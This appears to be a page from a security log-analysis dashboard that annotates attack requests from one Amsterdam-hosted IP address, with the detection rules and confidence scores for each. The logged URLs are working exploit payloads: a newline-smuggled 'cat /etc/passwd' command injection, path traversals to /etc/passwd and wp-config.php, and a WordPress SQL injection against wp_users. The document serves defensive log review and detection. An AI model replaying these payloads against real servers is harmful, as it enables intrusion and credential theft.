
Log Explorer

Fact drill-down for 95.179.133.74
Risk: 89 (HIGH) | Scope: All time | All-time facts: 1100 | In-scope: 1100 | Filtered: 1100 | Seen: 2023-10-14 to 2023-10-16

Annotated access events

Showing page 1 / 22 — total 1100 rows
#1 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301
ann trav 34 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Annotation facts
label
trav
rule
trav:sensitive_target
conf
95.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#2 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301
ann sfp 44 label sensitive_file
Request Explicit /etc/passwd read payload observed
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:payload:cat_passwd
conf
94.00
details
Payload contained an explicit attempt to read /etc/passwd. Snippet='/cgi-bin/kerbynet?Action=StartSessionSubmit&User=' cat /etc/passwd '&PW'
More (full fields + snapshot)
url
/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
summary
Explicit /etc/passwd read payload observed
details
Payload contained an explicit attempt to read /etc/passwd. Snippet='/cgi-bin/kerbynet?Action=StartSessionSubmit&User=' cat /etc/passwd '&PW'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#3 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301
ann hdrinj 24 label hdrinj
Request Encoded newline detected (%0d/%0a)
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Annotation facts
label
hdrinj
rule
hdrinj:encoded_newline
conf
90.00
details
Percent-encoded CR/LF sequences are a common indicator of CRLF injection / response splitting attempts.
More (full fields + snapshot)
url
/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
summary
Encoded newline detected (%0d/%0a)
details
Percent-encoded CR/LF sequences are a common indicator of CRLF injection / response splitting attempts.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#4 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#5 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301
ann cmdi 28 label cmdi
Request Command/file-injection indicator: cmdi:op_plus_cmd
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Annotation facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=' cat /etc/passwd '&PW -'
More (full fields + snapshot)
url
/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=' cat /etc/passwd '&PW -'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#6 2023-10-16 20:58:35 event 233594 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/free_time.cgi
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#7 2023-10-16 20:56:25 event 233591 GET 404 bytes 6301
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd'
More (full fields + snapshot)
url
/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#8 2023-10-16 20:56:25 event 233591 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#9 2023-10-16 20:56:25 event 233590 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/solr/admin/cores?wt=json
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#10 2023-10-16 20:54:47 event 233587 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/secure/ContactAdministrators!default.jspa
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#11 2023-10-16 20:53:34 event 233584 GET 404 bytes 6301
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/LetsEncrypt/Index?fileName=/etc/passwd'
More (full fields + snapshot)
url
/LetsEncrypt/Index?fileName=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/LetsEncrypt/Index?fileName=/etc/passwd'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#12 2023-10-16 20:53:34 event 233584 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/LetsEncrypt/Index?fileName=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#13 2023-10-16 20:49:44 event 233581 POST 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/checkValid
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#14 2023-10-16 20:48:18 event 233580 GET 400 bytes 157
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
-
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#15 2023-10-16 20:48:18 event 233580 GET 400 bytes 157
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
-
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#16 2023-10-16 20:48:18 event 233579 GET http —
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
UA
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
UA
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#17 2023-10-16 20:48:18 event 233579 GET http —
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
UA
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
UA
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#18 2023-10-16 20:48:18 event 233580 GET 400 bytes 157
ann ua 8 label ua
Annotation facts
label
ua
rule
ua:very_short
conf
65.00
details
Short/generic UAs are common in basic scripts and commodity automation.
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
-
UA
-
summary
Very short User-Agent string
details
Short/generic UAs are common in basic scripts and commodity automation.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#19 2023-10-16 20:48:18 event 233579 GET http —
ann ua 6 label ua
Annotation facts
label
ua
rule
ua:missing
conf
60.00
details
Request had no User-Agent value (missing/empty field).
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
UA
summary
Missing User-Agent header
details
Request had no User-Agent value (missing/empty field).
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#20 2023-10-16 20:48:18 event 233580 GET 400 bytes 157
ann sfp 34 label sensitive_file
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/h'
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
-
UA
-
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/h'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#21 2023-10-16 20:48:18 event 233580 GET 400 bytes 157
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
-
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
-
UA
-
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#22 2023-10-16 20:48:18 event 233579 GET http —
ann sfp 34 label sensitive_file
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/h'
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
UA
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/h'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#23 2023-10-16 20:48:18 event 233579 GET http —
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
UA
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
UA
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#24 2023-10-16 20:48:18 event 233580 GET 400 bytes 157
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
-
UA
-
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#25 2023-10-16 20:48:18 event 233579 GET http —
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
referer
UA
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#26 2023-10-16 20:47:33 event 233576 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/Admin
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#27 2023-10-16 20:47:06 event 233575 GET 200 bytes 8534
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#28 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/api/filemanager?path=%2F..%2f..%2fContent
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#29 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/api/filemanager?path=%2F..%2f..%2fContent
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#30 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301
ann sfp 8 label sensitive_file
Request File/path-style parameter observed (weak hint)
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:param:file_path_hint
conf
60.00
details
A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'
More (full fields + snapshot)
url
/api/filemanager?path=%2F..%2f..%2fContent
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
summary
File/path-style parameter observed (weak hint)
details
A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#31 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301
ann sfp 34 label sensitive_file
Request Directory traversal indicator
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/api/filemanager?path=/../../Content'
More (full fields + snapshot)
url
/api/filemanager?path=%2F..%2f..%2fContent
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/api/filemanager?path=/../../Content'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#32 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/api/filemanager?path=%2F..%2f..%2fContent
referer
-
UA
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#33 2023-10-16 20:45:04 event 233572 GET 403 bytes 555
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='gebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd'
More (full fields + snapshot)
url
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='gebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd'
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#34 2023-10-16 20:45:04 event 233572 GET 403 bytes 555
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
summary
event observed
details
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
#35 2023-10-16 20:45:01 event 233571 GET 403 bytes 555
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
95.179.133.0/24
asn
20473 — The Constant Company, LLC
geo
The Netherlands, North Holland, Amsterdam
org
Vultr Holdings LLC Amsterdam
